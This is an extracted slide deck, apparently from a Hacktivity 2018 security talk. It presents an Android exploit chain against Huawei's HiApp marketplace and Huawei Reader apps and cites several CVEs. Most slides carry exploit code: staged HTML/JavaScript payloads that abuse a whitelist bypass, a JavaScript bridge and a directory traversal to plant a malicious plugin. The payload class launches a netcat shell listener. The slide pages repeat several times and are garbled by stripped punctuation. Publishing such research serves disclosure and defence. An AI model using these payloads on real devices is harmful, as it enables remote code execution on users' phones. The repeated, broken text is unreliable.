bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 25: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/25.jpg)
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 26: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/26.jpg)
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 27: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/27.jpg)
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
![Page 28: Hacktivity 2018 - F-Secure Labs · Huawei phone switches apps twice. •Often requires a deeper understanding of the application •Automated detection is harder –how do you fuzz](https://reader034.fdocuments.in/reader034/viewer/2022042112/5e8ddbec58add17b881e4a8c/html5/thumbnails/28.jpg)
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
